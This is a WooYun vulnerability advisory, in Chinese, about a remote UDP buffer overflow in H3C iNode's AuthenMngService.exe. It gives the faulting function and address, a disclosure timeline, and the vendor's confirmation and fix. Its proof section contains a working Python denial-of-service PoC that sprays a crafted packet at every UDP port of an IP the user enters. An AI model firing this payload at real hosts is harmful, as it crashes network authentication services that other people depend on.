当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021661

漏洞标题:iNode远程缓冲区溢出拒绝服务0Day漏洞

相关厂商:杭州华三通信技术有限公司

漏洞作者: cssembly

提交时间:2013-04-12 10:34

修复时间:2013-07-11 10:34

公开时间:2013-07-11 10:34

漏洞类型:拒绝服务

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-12: 细节已通知厂商并且等待厂商处理中
2013-04-16: 厂商已经确认,细节仅向厂商公开
2013-04-19: 细节向第三方安全合作伙伴开放
2013-06-10: 细节向核心白帽子及相关领域专家公开
2013-06-20: 细节向普通白帽子公开
2013-06-30: 细节向实习白帽子公开
2013-07-11: 细节向公众公开

简要描述:

H3C iNode是杭州华三通信技术有限公司设计开发的一款用于用户认证上网的管理软件,该软件存在缓冲区溢出漏洞,攻击者可以远程发送攻击数据包,触发漏洞溢出,导致拒绝服务。

详细说明:

该漏洞存在于iNode软件安装后的AuthenMngService.exe文件中,它被注册为一个服务程序,以管理员权限运行,可接收网络上发送的udp数据包。以最新版iNode PC 5.2 (E0402)为例,漏洞位置在IDA反汇编结果的sub_459F10函数中,漏洞位置为0x45A2E2处的内存拷贝函数,如图

.PNG


拷贝数据长度字段可控,通过畸形数据就能导致远程拒绝服务攻击。

漏洞证明:

poc.py代码如下:
import socket
import time
Exploit_addr = raw_input( "input attack ip addr : " )
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
exploit_data='\x00\x01'+'A'*14+'\x74\x02\x64\x72\x1D\xA7\x9C\xC1\xBF\xBA\x86\x4C\x57\xEF\xCB\x78' + '\x3D\x01\x01\x11\x01'
for port in range( 1024 , 65535):
address = ( Exploit_addr , port )
s.sendto( exploit_data , address )
print 'port : ' , port
time.sleep(0.001)
s.close()
print 'Exploit End'
raw_input()
同之前提交的漏洞。但是无法执行任意代码

修复方案:

版权声明:转载请注明来源 cssembly@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-04-16 23:17

厂商回复:

最新状态:

2013-04-23:4月23日,经过CNVD协调,H3C(华三公司)已经发布了针对漏洞的解决方案,发布了新的inode版本。参考链接:http://kms.h3c.com/kms/kms/search/view.html?id=23553